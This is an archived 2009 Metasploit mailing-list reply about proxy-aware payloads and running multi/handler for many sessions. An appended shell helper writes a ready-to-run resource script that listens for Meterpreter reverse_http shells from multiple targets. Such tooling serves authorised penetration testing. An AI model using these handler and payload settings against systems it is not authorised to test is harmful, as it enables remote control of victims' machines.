Metasploit mailing list archives

Three questions: Proxies and the Wiki and multi/handler


From: hdm at metasploit.com (H D Moore)
Date: Thu, 07 May 2009 08:39:30 -0500

On Thu, 07 May 2009 08:26:16 -0500, Matt Gardenghi <mtgarden at gmail.com>  
wrote:

1) Is there a technique for setting a payload to work over a proxy?  I  
haven't noticed it yet, though that means little....

Some locations (i.e. my own company) proxy *everything.* My research
has indicated that not a whole lot of malware is proxy aware, but that
the foundation is being laid as companies are tightening up some of the
data exfiltration going on. So, will we see an automatic proxy detection
in our payloads or the ability to manually configure a proxy?

Proxy support increases size, which makes it harder to actually use
proxy-aware payloads. The best option we have now is the reverse_http
stager, recently rewritten by natron. This stager uses IE+HTTP (reading
local proxy settings from the registry, if the payload is running as a
configured user) and can be used to get a shell, VNC session, or
meterpreter prompt.

2) I understand that there are several interesting articles under  
trac.metasploit.com/wiki/ but I don't see a list for them anywhere.  So  
this makes it challenging to dig around and find useful articles.

Valid, we need a documentation overhaul.

3) multi/handler; is it possible to get the multi/handler to grab lots
of incoming connections? I seem to be missing this one as well. I
would assume it's possible, because it seems impractical to continually
create new exploits with new port numbers/instances of multi/handler to
target multiple machines simultaneously.

Yup.

msf exploit (multi/handler) > set ExitOnSession false
msf exploit (multi/handler) > exploit -j

-HD
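An added example, not from the original thread or from the Metasploit project: a small POSIX shell helper that writes an msfconsole resource script combining the two answers above, the proxy-aware reverse_http stager from question 1 and the persistent multi/handler settings from question 3 (ExitOnSession false, exploit -j). The IP address, port, output path and the `-z` flag (which stops the console from auto-interacting with the first session) are assumptions and placeholders to change for your own environment; the payload path windows/meterpreter/reverse_http is assumed to exist in your Metasploit install.

```shell
#!/bin/sh
# Added example (not from the original thread). Writes a resource script
# that keeps one multi/handler listening for many sessions, so you do not
# need a new handler/port per target. Run the result with:
#   msfconsole -q -r handler.rc
# Assumptions: LHOST/LPORT/payload below are placeholders; -z keeps the
# console from dropping you into the first session that arrives.

write_handler_rc() {
    # $1 = output path, $2 = LHOST, $3 = LPORT, $4 = payload name
    cat > "$1" <<EOF
use exploit/multi/handler
set PAYLOAD $4
set LHOST $2
set LPORT $3
# Do not tear the handler down after the first session comes in
set ExitOnSession false
# Background job (-j) so the console stays usable; -z: no auto-interact
exploit -j -z
EOF
}

# Constructed example values: a handler for the proxy-aware reverse_http stager
write_handler_rc handler.rc 192.0.2.10 8080 windows/meterpreter/reverse_http
```

Every target that calls back to the same LHOST:LPORT becomes a new numbered session under the single job; use `sessions -l` to list them and `sessions -i N` to interact.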

